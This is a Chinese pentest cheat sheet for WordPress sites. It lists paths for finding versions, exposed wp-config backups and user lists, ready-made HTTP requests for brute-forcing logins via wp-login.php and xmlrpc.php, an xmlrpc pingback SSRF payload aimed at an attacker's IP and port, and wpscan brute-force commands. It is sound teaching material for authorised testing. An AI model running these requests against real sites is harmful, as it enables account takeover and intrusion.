前言
在渗透测试中遇到WordPress框架的网站,我们要如何进行测试呢?
-
找到登录接口进行密码爆破
-
通过查看核心、插件和主题版本找到相关的CVE
常见的路径链接
登录页面
https://target.com/wp-login.php
WordPress的版本信息
https://target.com/feed
https://target.com/?feed=rss2
插件版本
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
https://target.com/wp-content/plugins/PLUGINNAME/README.txt
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT其中PLUGINNAME是变量,可以利用工具wpscan或nuclei批量获取
主题版本
https://target.com/wp-content/themes/THEMENAME/style.css
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用
日志文件
http://target.com/wp-content/debug.log
查找备份文件 wp-config
http://target.com/.wp-config.php.swp
http://target.com/wp-config.inc
http://target.com/wp-config.old
http://target.com/wp-config.txt
http://target.com/wp-config.html
http://target.com/wp-config.php.bak
http://target.com/wp-config.php.dist
http://target.com/wp-config.php.inc
http://target.com/wp-config.php.old
http://target.com/wp-config.php.save
http://target.com/wp-config.php.swp
http://target.com/wp-config.php.txt
http://target.com/wp-config.php.zip
http://target.com/wp-config.php.html
http://target.com/wp-config.php~获取网站用户名
http://target.com/?author=1
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
注册
http://example.com/wp-login.php?action=register
爆破后台账号密码
POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1或者
POST /xmlrpc.php HTTP/1.1
Host: target.com
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>BRUTEFORCE_IN_HERE</value></param>
</params>
</methodCall>
WordPress中的SSRF
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>
工具测试
工具wpscan
WPScan是一个WordPress安全扫描,用于检测和报告WordPress漏洞。
WPscan是由Ryan Dewhurst创建的WordPress漏洞扫描程序,由Sucuri赞助。它被预装在了BackBox Linux,Kali Linux,Pentoo,SamuraiWTF,BlackArch上,但不支持windows。
枚举WordPress版本,主题和插件
wpscan –url http://site.com/test/ –enumerate p
wpscan –url http://site.com/test/ –enumerate t枚举WordPress用户
wpscan –url http://site.com/test/ –enumerate u密码爆破
wpscan –url http://site.com/test/ –wordlist /root/Desktop/password.txt –username kcwto列举timthumbs
wpscan –url http://site.com/test/ –enumerate tt
将输出存储在单独的文件中
wpscan –url http://site.com/test/ –debug-output 2>debug.log
nuclei
nuclei.exe -u https://xxx.xxx.xxx/
WordPress 历史漏洞
一般都是插件漏洞,需要先检测WordPress是否存在附和条件的插件
获取插件版本后,访问https://wpscan.com
https://wpscan.com/wordpresses/
https://wpscan.com/plugins/
插件漏洞查找
比如查找wp-file-manager的已知漏洞
https://wpscan.com/plugin/wp-file-manager/
其他历史漏洞
https://mp.weixin.qq.com/s/aakTQ9fgUVzG61uEPySLXA
CVE-2022-2633 https://mp.weixin.qq.com/s/8vVpFgL0tAXETByy59QiEA
参考链接
https://mp.weixin.qq.com/s/IoO-T06od01GbR3s8RqBxw
https://mp.weixin.qq.com/s/jLBVuicMgW9d9_ZMu45Jcg
原文始发于微信公众号(进击的HACK):当渗透测试遇到WordPress
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论